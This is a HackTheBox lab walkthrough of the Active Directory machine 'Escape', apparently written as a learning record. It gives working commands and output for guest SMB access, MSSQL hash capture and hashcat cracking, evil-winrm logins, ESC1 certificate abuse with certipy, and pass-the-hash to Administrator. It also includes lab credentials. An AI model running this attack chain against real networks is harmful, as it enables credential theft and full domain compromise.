HTB - Escape
Descripiton
Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share that guest authenticated users can download a sensitive PDF file. Inside the PDF file temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to his machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user ryan.cooper. Further enumeration of the machine, reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are legible to use this template can request certificates for any other user on the domain including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the administrator user.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 17:36:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-03T17:33:04
|_Not valid after: 2054-11-03T17:33:04
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windowsSummary
* Open ports: 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - KERBEROS- RPC - SMB - LDAP - LDAPS - MSSQL - winRM - NTP
* Important notes: DNS:dc.sequel.htb - Domain: sequel.htb - Microsoft SQL Server 2019hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo sh -c "echo '$ip dc dc.sequel.htb sequel.htb ' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $tail -n1 /etc/hosts
10.10.11.202 dc dc.sequel.htb sequel.htbKerberos Enumeration
I started my enumeration process by bruting kerberos since I need domain account to attack the box as no web server here but with no luck
kerbrute userenum -d sequel.htb --dc $ip jsmith.txt -o users
SMB & RPC Enumeration
I moved then to smb and rpc services looking for misconfiguration in shared folder permissions or rpc. I found I had READ access on the Public share and no access to RPC.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED
I connected to the share and download a pdf file from it
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $impacket-smbclient sequel.htb/guest:''@dc
# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
# use Public
# ls
drw-rw-rw- 0 Sat Nov 19 06:51:25 2022 .
drw-rw-rw- 0 Sat Nov 19 06:51:25 2022 ..
-rw-rw-rw- 49551 Sat Nov 19 06:51:25 2022 SQL Server Procedures.pdf
# get SQL Server Procedures.pdfAfter opening the file, I noticed there are credentials at the end of it.
Foothold
PublicUser:GuestUserCantWrite1I can access the database with these creds :))
When I deal with mssql, I perform checklist for possible attack paths, So I will create one
Check for admin Access
Check the databases for juicy info and secrets
Check the possibility capture the
mssqlservice accountCheck for impersonate other users
Check for trustworthy database
Check for Linked Server
Check for Read or Write Access to the file system
Check for executing command with
xp_cmdshell
SQL (PublicUser guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (PublicUser guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
---------- ---------------- ----------- -------------- ------------------ ------------ -------
DC\SQLMOCK SQLNCLI SQL Server DC\SQLMOCK NULL NULL NULL
SQL (PublicUser guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
SQL (PublicUser guest@master)> enum_users
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
------------------ -------- --------- --------- ------------- ---------- -----
dbo db_owner sa master dbo b'1 ' b'01'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
sys public NULL NULL NULL b'4 ' NULLNothing is interesting till now but I got the hash of service account using local smb server.
The hash is cracked successfully
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $hashcat -m 5600 sql.hash /usr/share/wordlists/rockyou.txt
..snip..
SQL_SVC::sequel:aaaaaaaaaaaaaaaa:afe08a49ef50bb618c7ebe172f3fc719:01010000000000008014fb68d92ddb01dff7d14561d219d700000000010010006a006c00720069006500550047005300030010006a006c007200690065005500470053000200100071004c0043004300780042007a0049000400100071004c0043004300780042007a004900070008008014fb68d92ddb01060004000200000008003000300000000000000000000000003000008ab9cecef8fc5bd1bf12dec37969b9f951514a8bb2b1613c8c474ba64776dcc40a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310032000000000000000000:REGGIE1234ronnie
Session..........: hashcat
Status...........: CrackedI can also access the database with the new account.
The account don't have special permissions So I will move to winRM
SQL (sequel\sql_svc guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin')
-
0 Lateral Movement
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $evil-winrm -i dc -u sql_svc -p REGGIE1234ronnie
*Evil-WinRM* PS C:\Users\sql_svc\Documents>Under C:\SQLServer\Logs, there is a .bak file containing logs info of MSSQL instance. What is interesting is that I find Ruan.Cooper trying to login and failed. Maybe I can use this string as a password NuclearMosquito3
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
..snip..
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
..snip..And the password is correct :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 Privilege Escalation
I accessed the machine as Ryan and found he is a member of Certificate Service DCOM Access
I need to enumerate the PKI of the domain since this group exists. A CA is found in the domain with name of sequel-DC-CA
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3 -M adcs
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
ADCS 10.10.11.202 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.202 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.10.11.202 389 DC Found CN: sequel-DC-CAThen, I looked at vulnerable template for possible Escalation paths (ESC)
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -vulnerable -stdout
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
..snip..
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authenticationThe template UserAuthentication is vulnerable to ESC1 which means I can request certificate with alternative principal name (upn)
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5xxxxxxxxxxxxx┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $evil-winrm -i dc -u administrator -H a52f78e4c751e5f5exxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6ecb67c8db147ac353xxxxxxxxxxxxxxxRoot Flag: 6ecb67c8db147ac353xxxxxxxxxxxxxxx
Last updated